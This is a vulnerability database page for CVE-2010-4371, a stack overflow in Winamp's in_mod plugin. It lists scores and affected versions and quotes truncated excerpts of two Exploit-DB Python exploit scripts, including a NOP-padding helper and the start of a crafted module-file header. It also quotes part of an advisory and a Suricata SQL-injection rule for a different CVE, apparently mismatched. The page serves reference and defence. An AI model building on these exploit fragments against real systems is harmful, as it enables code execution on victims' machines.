CVE-2010-4371
published 2010-12-02CVE-2010-4371: Buffer overflow in the in_mod plugin in Winamp before 5.6 allows remote attackers to have an unspecified impact via vectors related to the comment box.
PriorityP350critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.10%
92.5th percentile
Buffer overflow in the in_mod plugin in Winamp before 5.6 allows remote attackers to have an unspecified impact via vectors related to the comment box.
Affected
57 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nullsoft | winamp | <= 5.581 | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS AvailScript Article Script articles.php aIDS Parameter SQL Injection
suricata·2010-07-30·CVSS 7.5
CVE-2008-4371 [HIGH] ET WEB_SPECIFIC_APPS AvailScript Article Script articles.php aIDS Parameter SQL Injection
ET WEB_SPECIFIC_APPS AvailScript Article Script articles.php aIDS Parameter SQL Injection
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS AvailScript Article Script articles.php aIDS Parameter SQL Injection"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/articles.php?"; nocase; content:"aIDS="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2008-4371; reference:url,secunia.com/advisories/31816/; reference:url,milw0rm.com/exploits/6409; classtype:web-application-attack; sid:2009747; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2024_03_06, mitre_t
Exploit-DB
Winamp 5.5.8.2985 (in_mod plugin) - Local Stack Overflow
exploitdb·2010-10-25
CVE-2010-4371 Winamp 5.5.8.2985 (in_mod plugin) - Local Stack Overflow
Winamp 5.5.8.2985 (in_mod plugin) - Local Stack Overflow
---
#!/usr/bin/python
# Pwn And Beans by Mighty-D and 7eK presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# A Script Kiddie Friendly Production
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# An improvement to http://www.exploit-db.com/exploits/15287/
# POC by fdisk
# MemMove Idea from: A.Gomez
# Exploit by Mighty-D and 7eK
# Special thanks to:
# fdisk: Who wrote the skeleton of what you are looking at
# Ryujin: For pointing the bug
# EDB-Team
# UdeA GITA SSI
import struct
def fill(shellcode):
nopsFaltantes = ((len(shellcode) / 40)+1)*40 - len(shellcode)
shellcode += '\x90'*nopsFaltantes
return shellcode
header = "\x4D\x54\x4D\x10\x63\x6C\x69
Exploit-DB
Winamp 5.5.8 (in_mod plugin) - Local Stack Overflow
exploitdb·2010-10-19
CVE-2010-4371 Winamp 5.5.8 (in_mod plugin) - Local Stack Overflow
Winamp 5.5.8 (in_mod plugin) - Local Stack Overflow
---
#!/usr/bin/python
# Pwn And Beans by Mighty-D presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC by fdisk
# Exploit by Mighty-D
# Special thanks to:
# fdisk: Who wrote the skeleton of what you are looking at
# Ryujin: For pointing the bug
# Muts: For bringing the pain and the omelet ideas that weren't used
# dijital1 and All the EDB-Team
# The guys from UdeA, Ryepes, HerreraDavid, GomezRam7
# Just one comment: Stupid badchars!!!!!!!
header = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E"
header += "\x04\x0C"
Exploit-DB
Winamp 5.5.8.2985 - Multiple Buffer Overflows
exploitdb·2010-10-13
CVE-2010-4371 Winamp 5.5.8.2985 - Multiple Buffer Overflows
Winamp 5.5.8.2985 - Multiple Buffer Overflows
---
Source: http://aluigi.org/adv/winamp_1-adv.txt
#######################################################################
Luigi Auriemma
Application: Winamp
http://www.winamp.com
Versions: > 3);
C] integer overflow in in_midi
The in_midi plugin is affected by an heap overflow during the handling
of the hmp files (a format used in some old DOS games) where a
variable-length 32bit value is used for the copying of data with
memcpy() from the attacker's data to a heap buffer which has not been
reallocated for matching the needed size due to an integer overflow.
Doesn't seem possible to control the code execution.
D] buffer-overflow in in_mod
The in_mod plugin is affected by a stack overflow which happens during
the handling of a malforme
No writeups or analysis indexed.
http://forums.winamp.com/showthread.php?t=324322http://forums.winamp.com/showthread.php?threadid=159785https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12309http://forums.winamp.com/showthread.php?t=324322http://forums.winamp.com/showthread.php?threadid=159785https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12309
2010-12-02
Published